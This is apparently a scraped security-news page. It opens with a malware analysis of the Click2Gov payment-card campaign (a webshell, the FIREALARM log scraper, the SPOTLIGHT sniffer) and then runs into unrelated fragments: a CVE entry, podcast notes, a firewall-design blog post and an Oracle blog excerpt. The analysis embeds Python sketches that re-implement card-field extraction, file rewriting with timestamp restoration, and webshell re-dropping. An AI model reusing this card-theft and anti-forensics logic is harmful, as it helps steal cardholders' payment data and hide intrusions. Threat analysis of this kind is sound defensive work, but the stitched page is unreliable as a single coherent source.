On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle WebLogic, such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.

Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

After editing a Click2Gov XML configuration file, the attacker would restart the affected module in DEBUG mode using the SJavaWebManage CMDS page. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files, which follow the naming convention Click2GovCX.logYYYY-MM-DD.


Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numeric arguments (year, month, and day), as in the sample command line evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If a log file exists, FIREALARM copies its MAC (Modified, Accessed, Created) times so it can later timestomp the file back to its original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file, and the timestamps are restored to the previously copied originals. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.
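The log-parsing logic described above can be approximated in a short sketch. The field names and the Click2GovCX.logYYYY-MM-DD naming convention come from the post; the `field=value` line layout and the helper names are assumptions for illustration only, as the real log format is not documented (FIREALARM itself is C/C++; Python is used here for brevity):

```python
import re
from datetime import date, timedelta
from pathlib import Path

# Fields FIREALARM reportedly extracts from Click2GovCX log lines.
FIELDS = [
    "medium.accountNumber",
    "medium.cvv2",
    "medium.expirationDate.year",
    "medium.expirationDate.month",
    "medium.firstName",
    "medium.lastName",
    "medium.middleInitial",
]

def parse_line(line):
    """Return {field: value} for any tracked fields found on one log line.

    Assumes a 'field=value' layout, which is an illustrative guess.
    """
    found = {}
    for field in FIELDS:
        m = re.search(re.escape(field) + r"=(\S+)", line)
        if m:
            found[field] = m.group(1)
    return found

def log_paths(start, directory="."):
    """Yield Click2GovCX.logYYYY-MM-DD paths from a start date to today."""
    day = start
    while day <= date.today():
        yield Path(directory) / f"Click2GovCX.log{day.isoformat()}"
        day += timedelta(days=1)
```

Given the sample invocation `evil.exe 2018 09 01`, the equivalent here would be iterating `log_paths(date(2018, 9, 1))` and running `parse_line` over each line of each file that exists.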

Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file, and timestomps it with the original times.
  5. THN1080.tmp is deleted.
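The MAC-time preservation in step 4 can be illustrated with a minimal sketch (Python for brevity; FIREALARM itself is C/C++). Note that `os.utime` restores only the modified and accessed times; restoring creation time requires platform-specific calls and is omitted here:

```python
import os

def rewrite_preserving_times(path, new_contents):
    """Rewrite a file, then restore its original modified/accessed times.

    Mirrors the technique described in the post: copy the timestamps
    first, replace the contents (e.g. with error lines only), then
    stomp the times back so the edit is less obvious.
    """
    st = os.stat(path)                      # capture original times
    with open(path, "w") as f:
        f.write(new_contents)               # replace file contents
    os.utime(path, (st.st_atime, st.st_mtime))  # restore A/M times
```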


Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker more durable persistence on the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.
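The hourly self-healing check can be sketched as follows. The two paths come from the post; the Base64 payload here is a harmless placeholder standing in for the embedded webshell, and the function names are illustrative (SPOTLIGHT itself is C/C++):

```python
import base64
import time
from pathlib import Path

# Paths checked hourly, per the post.
WATCHED = [
    Path(r"C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp"),
    Path(r"C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp"),
]

# Placeholder standing in for the embedded, Base64-encoded webshell.
PAYLOAD_B64 = base64.b64encode(b"<%-- placeholder --%>").decode()

def ensure_files(paths=WATCHED, payload_b64=PAYLOAD_B64):
    """Recreate any missing watched file from the embedded payload."""
    for p in paths:
        if not p.exists():
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(base64.b64decode(payload_b64))

def watch_loop():
    """Hourly check, as described in the post."""
    while True:
        ensure_files()
        time.sleep(3600)
```

This pattern is why deleting the webshell alone did not evict the attacker: the service quietly rewrote it within the hour.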

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on ports 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs: the buffer exceeds 102,399 bytes, or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either condition occurs, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.
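The buffering condition and the tag-extraction-and-encoding step can be sketched together. The tag names, flush conditions, and pipe-separated Base64 record format come from the post; everything else (function names, regex-based extraction) is an illustrative assumption:

```python
import base64
import re

# Tags SPOTLIGHT reportedly extracts from buffered POST bodies.
TAGS = ["AccountNum", "CSC", "ExpDate", "FirstName", "LastName",
        "MInitial", "Street1", "Street2", "City", "State", "PostalCode"]

FLUSH_PREFIX = b"POST /OnePoint/services/OnePointService"

def should_flush(buf):
    """Flush when the buffer exceeds 102,399 bytes or begins with the
    OnePoint POST prefix, per the post."""
    return len(buf) > 102399 or buf.startswith(FLUSH_PREFIX)

def extract_record(buffer_text):
    """Pull <op:Tag> contents, join with '|', Base64-encode the record."""
    values = []
    for tag in TAGS:
        m = re.search(rf"<op:{tag}>(.*?)</op:{tag}>", buffer_text, re.S)
        values.append(m.group(1) if m else "")
    record = "|".join(values)
    return base64.b64encode(record.encode()).decode()
```

One encoded record per buffered request would then be appended to c:\windows\temp\opt.log, which the attacker later exfiltrated wholesale through the webshell's file manager.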

Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.


Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.


In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure any web service accounts run with least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may resurface in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.


FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as nation-state-sponsored or financially motivated intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)


  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)


  • e2c2d8bad36ac3e446797c485ce8b394


  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

Penetration Tests vs. Vulnerability Scans: Understanding the Differences

Penetration tests and vulnerability scans are related but different cyber security services. The difference between penetration tests and vulnerability scans is a common source of confusion. While both are important tools for cyber risk analysis and are mandated under PCI DSS, HIPAA, and other security standards and frameworks, they are quite different. Let’s examine the… Read More

CVE-2018-6693 (endpoint_security_for_linux_threat_prevention, endpoint_security_linux_threat_prevention)

An unprivileged user can delete arbitrary files on a Linux system running ENSLTP 10.5.1, 10.5.0, and 10.2.3 Hotfix 1246778 and earlier. By exploiting a time of check to time of use (TOCTOU) race condition during a specific scanning sequence, the unprivileged user is able to perform a privilege escalation to delete arbitrary files.
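The TOCTOU pattern behind this class of bug can be illustrated generically. This is not ENSLTP's code, just a sketch of the race: a privileged process checks a path, and an attacker can swap the path for a symlink to a protected file between the check and the use:

```python
import os

def vulnerable_delete(path):
    """Check-then-use anti-pattern: the check and the delete are not atomic.

    A racing attacker can replace `path` with a symlink to a protected
    file between os.path.islink() returning False and os.remove().
    """
    if not os.path.islink(path):   # time of check
        os.remove(path)            # time of use; race window is here

def safer_delete(dir_fd, name):
    """Mitigation sketch: operate relative to a held directory file
    descriptor so the containing path cannot be swapped out from under
    the operation (POSIX-only; requires dir_fd support in os.unlink)."""
    os.unlink(name, dir_fd=dir_fd)
```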

Drone Assassins, Security Shaming, and Zero-Day – Hack Naked News #189

Drone assassins are cheap, deadly, and at your local store, State Department shamed, MS-ISAC releases an advisory on PHP vulnerabilities, a nasty piece of CSS code, a Zero-Day bug in CCTV surveillance cameras, and FreeBSD has its own TCP-queue-of-death bug! Jason Wood's expert commentary on The Effectiveness of Publicly Shaming Bad Security!

Full Show Notes: Visit to get all the latest episodes!

Firewalls and the Need for Speed

I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:

This bothered me, so I Tweeted about it.

This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:

What do you think of this architecture?

My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

Implementing these non-firewall-based security choices requires a high degree of diligence, which requires visibility. I did not see this emphasized in the NSRC presentation. For example:

These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.

I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhanced monitoring for the networks discussed above, and to think carefully before enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

Convergence is the Key to Future-Proofing Security

I published a new article today on the Oracle Security blog that looks at the benefits of convergence in the security space as the IT landscape grows more disparate and distributed.

Security professionals have too many overlapping products under management and it's challenging to get quick and complete answers across hybrid, distributed environments. It's challenging to fully automate detection and response. There is too much confusion about where to get answers, not enough talent to cover the skills requirement, and significant hesitation to put the right solutions in place because there's already been so much investment.

Here are a couple of excerpts:
Here’s the good news: Security solutions are evolving toward cloud, toward built-in intelligence via Machine Learning, and toward unified, integrated-by-design platforms. This approach eliminates the issues of product overlap because each component is designed to leverage the others. It reduces the burden related to maintaining skills because fewer skills are needed and the system is more autonomous. And, it promotes immediate and automated response as opposed to indecision. While there may not be a single platform to replace all 50 or 100 of your disparate security products today, platforms are emerging that can address core security functions while simplifying ownership and providing open integration points to seamlessly share security intelligence across functions.
 Forward-looking security platforms will leverage hybrid cloud architecture to address hybrid cloud environments. They’re autonomous systems that operate without relying on human maintenance, patching, and monitoring. They leverage risk intelligence from across the numerous available sources. And then they rationalize that data and use Machine Learning to generate better security intelligence and feed that improved intelligence back to the decision points. And they leverage built-in integration points and orchestration functionality to automate response when appropriate.
Click to read the full article: Convergence is the Key to Future-Proofing Security